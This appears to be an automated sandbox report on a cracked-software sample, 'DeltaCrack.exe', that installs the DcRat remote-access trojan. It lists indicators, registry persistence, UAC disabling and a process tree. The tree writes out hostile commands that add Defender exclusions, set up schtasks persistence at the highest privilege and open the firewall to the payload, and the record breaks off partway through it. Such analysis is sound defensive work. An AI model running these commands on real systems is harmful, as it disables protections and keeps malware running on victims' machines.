Analysis
-
max time kernel
55s -
max time network
57s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
02-02-2025 12:46
Static task
static1
Behavioral task
behavioral1
Sample
DeltaCrack.exe
Resource
win11-20241007-en
General
-
Target
DeltaCrack.exe
-
Size
12KB
-
MD5
b6f8ce701bcbc0dea1ce3932bad8bd59
-
SHA1
5b0117f1ac2649173034784574426d3875c1c2a9
-
SHA256
2637fba7a82cf6b7b65ecea2e83da886d4252db8bf64e8dc4de29768c828745c
-
SHA512
a83d4555adfa3b9bf664b774fd60d70286e2cb3dcef36688b056d643b3b6e919485bfc55146fc24447e5367531c22ef58894d0fe20836316596ea34b95d7a2b3
-
SSDEEP
192:6JcV4aQPPUEdt5ymbzRH+GxfekEcDZbU865/WH1yaME+zrq9:6JcV49PM+tYmbNj9emy865Iyw+zrq
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Modifies WinLogon for persistence 2 TTPs 11 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Mail\\WmiPrvSE.exe\", \"C:\\blockwin\\dllhost.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Mail\\WmiPrvSE.exe\", \"C:\\blockwin\\dllhost.exe\", \"C:\\Program Files\\Java\\jre-1.8\\legal\\javafx\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\cmd.exe\", \"C:\\Program Files\\Google\\SppExtComObj.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Mail\\WmiPrvSE.exe\", \"C:\\blockwin\\dllhost.exe\", \"C:\\Program Files\\Java\\jre-1.8\\legal\\javafx\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\cmd.exe\", \"C:\\Program Files\\Google\\SppExtComObj.exe\", \"C:\\Recovery\\WindowsRE\\System.exe\", \"C:\\Windows\\IME\\it-IT\\dllhost.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Mail\\WmiPrvSE.exe\", \"C:\\blockwin\\dllhost.exe\", \"C:\\Program Files\\Java\\jre-1.8\\legal\\javafx\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\cmd.exe\", \"C:\\Program Files\\Google\\SppExtComObj.exe\", \"C:\\Recovery\\WindowsRE\\System.exe\", \"C:\\Windows\\IME\\it-IT\\dllhost.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Idle.exe\", \"C:\\Windows\\Performance\\WinSAT\\DataStore\\sppsvc.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Mail\\WmiPrvSE.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Mail\\WmiPrvSE.exe\", \"C:\\blockwin\\dllhost.exe\", \"C:\\Program Files\\Java\\jre-1.8\\legal\\javafx\\WmiPrvSE.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Mail\\WmiPrvSE.exe\", \"C:\\blockwin\\dllhost.exe\", \"C:\\Program Files\\Java\\jre-1.8\\legal\\javafx\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\cmd.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Mail\\WmiPrvSE.exe\", \"C:\\blockwin\\dllhost.exe\", \"C:\\Program Files\\Java\\jre-1.8\\legal\\javafx\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\cmd.exe\", \"C:\\Program Files\\Google\\SppExtComObj.exe\", \"C:\\Recovery\\WindowsRE\\System.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Mail\\WmiPrvSE.exe\", \"C:\\blockwin\\dllhost.exe\", \"C:\\Program Files\\Java\\jre-1.8\\legal\\javafx\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\cmd.exe\", \"C:\\Program Files\\Google\\SppExtComObj.exe\", \"C:\\Recovery\\WindowsRE\\System.exe\", \"C:\\Windows\\IME\\it-IT\\dllhost.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Idle.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Mail\\WmiPrvSE.exe\", \"C:\\blockwin\\dllhost.exe\", \"C:\\Program Files\\Java\\jre-1.8\\legal\\javafx\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\cmd.exe\", \"C:\\Program Files\\Google\\SppExtComObj.exe\", \"C:\\Recovery\\WindowsRE\\System.exe\", \"C:\\Windows\\IME\\it-IT\\dllhost.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Idle.exe\", \"C:\\Windows\\Performance\\WinSAT\\DataStore\\sppsvc.exe\", \"C:\\blockwin\\WmiPrvSE.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Windows\\Web\\xdwdDelta.exe" ThirdPartyGUI.exe -
Process spawned unexpected child process 30 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1224 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4620 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2544 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3800 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5108 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4352 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2500 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4884 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4832 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1400 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 228 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2176 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 688 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2608 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2096 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2512 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2744 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2060 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3508 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3968 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3384 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1144 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3500 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1844 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 780 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 888 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4596 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2900 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4544 2808 schtasks.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4800 2808 schtasks.exe 84 -
UAC bypass 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" perfNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" perfNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" perfNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Idle.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Idle.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" Idle.exe -
resource yara_rule behavioral1/files/0x001f00000002aa77-87.dat dcrat behavioral1/files/0x001a00000002aaac-131.dat dcrat behavioral1/memory/1592-133-0x0000000000890000-0x0000000000BCE000-memory.dmp dcrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2436 powershell.exe 1648 powershell.exe -
Downloads MZ/PE file 2 IoCs
flow pid Process 5 900 DeltaCrack.exe 4 900 DeltaCrack.exe -
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
Executes dropped EXE 6 IoCs
pid Process 5004 ThirdPartyGUI.exe 4916 DCRatBuilda.exe 2844 xdwdDelta.exe 1592 perfNet.exe 3524 Idle.exe 1604 xdwdDelta.exe -
Loads dropped DLL 46 IoCs
pid Process 2484 Process not Found 2844 xdwdDelta.exe 4036 Process not Found 2732 Process not Found 1592 perfNet.exe 1224 schtasks.exe 4620 schtasks.exe 2544 schtasks.exe 3800 schtasks.exe 5108 schtasks.exe 4352 schtasks.exe 2500 schtasks.exe 4884 schtasks.exe 4832 schtasks.exe 1400 schtasks.exe 228 schtasks.exe 2176 schtasks.exe 688 schtasks.exe 2608 schtasks.exe 2096 schtasks.exe 2512 schtasks.exe 2744 schtasks.exe 2060 schtasks.exe 3508 schtasks.exe 3968 schtasks.exe 3384 schtasks.exe 1144 schtasks.exe 3500 schtasks.exe 1844 schtasks.exe 780 schtasks.exe 888 schtasks.exe 4596 schtasks.exe 2900 schtasks.exe 4544 schtasks.exe 4800 schtasks.exe 3524 Idle.exe 4532 WScript.exe 4872 WScript.exe 1604 xdwdDelta.exe 1792 Process not Found 2452 Process not Found 128 vssvc.exe 4580 Process not Found 1224 Process not Found 1344 WmiApSrv.exe 1332 Process not Found -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 20 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\blockwin\\dllhost.exe\"" perfNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Program Files\\Google\\SppExtComObj.exe\"" perfNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Recovery\\WindowsRE\\System.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Recovery\\WindowsRE\\System.exe\"" perfNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Windows\\Performance\\WinSAT\\DataStore\\sppsvc.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\blockwin\\WmiPrvSE.exe\"" perfNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Program Files\\Windows Mail\\WmiPrvSE.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Program Files\\Java\\jre-1.8\\legal\\javafx\\WmiPrvSE.exe\"" perfNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\cmd.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Program Files\\Google\\SppExtComObj.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\IME\\it-IT\\dllhost.exe\"" perfNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Idle.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Idle.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Program Files\\Windows Mail\\WmiPrvSE.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\blockwin\\dllhost.exe\"" perfNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Program Files\\Java\\jre-1.8\\legal\\javafx\\WmiPrvSE.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\cmd.exe\"" perfNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\IME\\it-IT\\dllhost.exe\"" perfNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Windows\\Performance\\WinSAT\\DataStore\\sppsvc.exe\"" perfNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\blockwin\\WmiPrvSE.exe\"" perfNet.exe -
Checks whether UAC is enabled 1 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA perfNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" perfNet.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Idle.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Idle.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ipinfo.io 13 ipinfo.io -
Drops file in Program Files directory 11 IoCs
description ioc Process File created C:\Program Files\Windows Mail\WmiPrvSE.exe perfNet.exe File created C:\Program Files\Java\jre-1.8\legal\javafx\24dbde2999530e perfNet.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\logs\ebf1f9fa8afd6d perfNet.exe File created C:\Program Files\Google\SppExtComObj.exe perfNet.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Idle.exe perfNet.exe File opened for modification C:\Program Files\Windows Mail\WmiPrvSE.exe perfNet.exe File created C:\Program Files\Windows Mail\24dbde2999530e perfNet.exe File created C:\Program Files\Java\jre-1.8\legal\javafx\WmiPrvSE.exe perfNet.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\logs\cmd.exe perfNet.exe File created C:\Program Files\Google\e1ef82546f0b02 perfNet.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\6ccacd8608530f perfNet.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File created C:\Windows\Web\xdwdDelta.exe ThirdPartyGUI.exe File created C:\Windows\xdwd.dll ThirdPartyGUI.exe File created C:\Windows\PrintDialog\en-US\spoolsv.exe perfNet.exe File created C:\Windows\IME\it-IT\dllhost.exe perfNet.exe File created C:\Windows\IME\it-IT\5940a34987c991 perfNet.exe File created C:\Windows\Performance\WinSAT\DataStore\sppsvc.exe perfNet.exe File created C:\Windows\Performance\WinSAT\DataStore\0a1fd5f707cd16 perfNet.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DeltaCrack.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DCRatBuilda.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings DCRatBuilda.exe Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings Idle.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 33 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3500 schtasks.exe 4588 schtasks.exe 2500 schtasks.exe 4884 schtasks.exe 2608 schtasks.exe 3384 schtasks.exe 4620 schtasks.exe 4832 schtasks.exe 2512 schtasks.exe 2744 schtasks.exe 780 schtasks.exe 2900 schtasks.exe 3800 schtasks.exe 4352 schtasks.exe 228 schtasks.exe 2096 schtasks.exe 1844 schtasks.exe 4596 schtasks.exe 3692 schtasks.exe 2544 schtasks.exe 2176 schtasks.exe 2060 schtasks.exe 4544 schtasks.exe 4800 schtasks.exe 1224 schtasks.exe 5108 schtasks.exe 688 schtasks.exe 3508 schtasks.exe 1144 schtasks.exe 3172 schtasks.exe 1400 schtasks.exe 3968 schtasks.exe 888 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1648 powershell.exe 1648 powershell.exe 2436 powershell.exe 2436 powershell.exe 1592 perfNet.exe 1592 perfNet.exe 1592 perfNet.exe 1592 perfNet.exe 1592 perfNet.exe 1592 perfNet.exe 1592 perfNet.exe 1224 schtasks.exe 1224 schtasks.exe 4620 schtasks.exe 4620 schtasks.exe 2544 schtasks.exe 2544 schtasks.exe 3800 schtasks.exe 3800 schtasks.exe 5108 schtasks.exe 5108 schtasks.exe 4352 schtasks.exe 4352 schtasks.exe 2500 schtasks.exe 2500 schtasks.exe 4884 schtasks.exe 4884 schtasks.exe 4832 schtasks.exe 4832 schtasks.exe 1400 schtasks.exe 1400 schtasks.exe 228 schtasks.exe 228 schtasks.exe 1592 perfNet.exe 1592 perfNet.exe 2176 schtasks.exe 2176 schtasks.exe 688 schtasks.exe 688 schtasks.exe 2608 schtasks.exe 2608 schtasks.exe 2096 schtasks.exe 2096 schtasks.exe 2512 schtasks.exe 2512 schtasks.exe 2744 schtasks.exe 2744 schtasks.exe 2060 schtasks.exe 2060 schtasks.exe 3508 schtasks.exe 3508 schtasks.exe 3968 schtasks.exe 3968 schtasks.exe 3384 schtasks.exe 3384 schtasks.exe 1144 schtasks.exe 1144 schtasks.exe 3500 schtasks.exe 3500 schtasks.exe 1844 schtasks.exe 1844 schtasks.exe 780 schtasks.exe 780 schtasks.exe 888 schtasks.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 900 DeltaCrack.exe Token: SeDebugPrivilege 1648 powershell.exe Token: SeDebugPrivilege 2436 powershell.exe Token: SeDebugPrivilege 5004 ThirdPartyGUI.exe Token: SeDebugPrivilege 2844 xdwdDelta.exe Token: SeIncBasePriorityPrivilege 2844 xdwdDelta.exe Token: SeDebugPrivilege 1592 perfNet.exe Token: SeDebugPrivilege 3524 Idle.exe Token: SeDebugPrivilege 1604 xdwdDelta.exe Token: SeBackupPrivilege 128 vssvc.exe Token: SeRestorePrivilege 128 vssvc.exe Token: SeAuditPrivilege 128 vssvc.exe -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 900 wrote to memory of 1648 900 DeltaCrack.exe 78 PID 900 wrote to memory of 1648 900 DeltaCrack.exe 78 PID 900 wrote to memory of 1648 900 DeltaCrack.exe 78 PID 900 wrote to memory of 2436 900 DeltaCrack.exe 80 PID 900 wrote to memory of 2436 900 DeltaCrack.exe 80 PID 900 wrote to memory of 2436 900 DeltaCrack.exe 80 PID 900 wrote to memory of 5004 900 DeltaCrack.exe 82 PID 900 wrote to memory of 5004 900 DeltaCrack.exe 82 PID 900 wrote to memory of 4916 900 DeltaCrack.exe 83 PID 900 wrote to memory of 4916 900 DeltaCrack.exe 83 PID 900 wrote to memory of 4916 900 DeltaCrack.exe 83 PID 4916 wrote to memory of 572 4916 DCRatBuilda.exe 85 PID 4916 wrote to memory of 572 4916 DCRatBuilda.exe 85 PID 4916 wrote to memory of 572 4916 DCRatBuilda.exe 85 PID 4916 wrote to memory of 4984 4916 DCRatBuilda.exe 86 PID 4916 wrote to memory of 4984 4916 DCRatBuilda.exe 86 PID 4916 wrote to memory of 4984 4916 DCRatBuilda.exe 86 PID 5004 wrote to memory of 4608 5004 ThirdPartyGUI.exe 88 PID 5004 wrote to memory of 4608 5004 ThirdPartyGUI.exe 88 PID 5004 wrote to memory of 416 5004 ThirdPartyGUI.exe 90 PID 5004 wrote to memory of 416 5004 ThirdPartyGUI.exe 90 PID 5004 wrote to memory of 1188 5004 ThirdPartyGUI.exe 92 PID 5004 wrote to memory of 1188 5004 ThirdPartyGUI.exe 92 PID 416 wrote to memory of 3692 416 cmd.exe 93 PID 416 wrote to memory of 3692 416 cmd.exe 93 PID 1188 wrote to memory of 3172 1188 cmd.exe 95 PID 1188 wrote to memory of 3172 1188 cmd.exe 95 PID 5004 wrote to memory of 2844 5004 ThirdPartyGUI.exe 96 PID 5004 wrote to memory of 2844 5004 ThirdPartyGUI.exe 96 PID 2844 wrote to memory of 1672 2844 xdwdDelta.exe 97 PID 2844 wrote to memory of 1672 2844 xdwdDelta.exe 97 PID 1672 wrote to memory of 4588 1672 cmd.exe 99 PID 1672 wrote to memory of 4588 1672 cmd.exe 99 PID 572 wrote to memory of 2280 572 WScript.exe 100 PID 572 wrote to memory of 2280 572 WScript.exe 100 PID 572 wrote to memory of 2280 572 WScript.exe 100 PID 2280 wrote to memory of 1592 2280 cmd.exe 102 PID 2280 wrote to memory of 1592 2280 cmd.exe 102 PID 1592 wrote to memory of 3524 1592 perfNet.exe 133 PID 1592 wrote to memory of 3524 1592 perfNet.exe 133 PID 3524 wrote to memory of 4532 3524 Idle.exe 134 PID 3524 wrote to memory of 4532 3524 Idle.exe 134 PID 3524 wrote to memory of 4872 3524 Idle.exe 135 PID 3524 wrote to memory of 4872 3524 Idle.exe 135 -
System policy modification 1 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" perfNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" perfNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" perfNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Idle.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Idle.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" Idle.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\DeltaCrack.exe"C:\Users\Admin\AppData\Local\Temp\DeltaCrack.exe"1⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:900 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ThirdPartyGUI.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1648
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\DCRatBuilda.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
C:\Users\Admin\AppData\Local\Temp\ThirdPartyGUI.exe"C:\Users\Admin\AppData\Local\Temp\ThirdPartyGUI.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\SYSTEM32\CMD.exe"CMD" netsh advfirewall firewall add rule name="euC2j"B@jCobjs" dir=in action=allow program="C:\Windows\Web\xdwdDelta.exe" enable=yes & exit3⤵PID:4608
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\RuntimeOpen" /tr "C:\Windows\Web\xdwdDelta.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
PID:416 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\RuntimeOpen" /tr "C:\Windows\Web\xdwdDelta.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:3692
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Setup" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Web\xdwdDeltaOpen.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
PID:1188 -
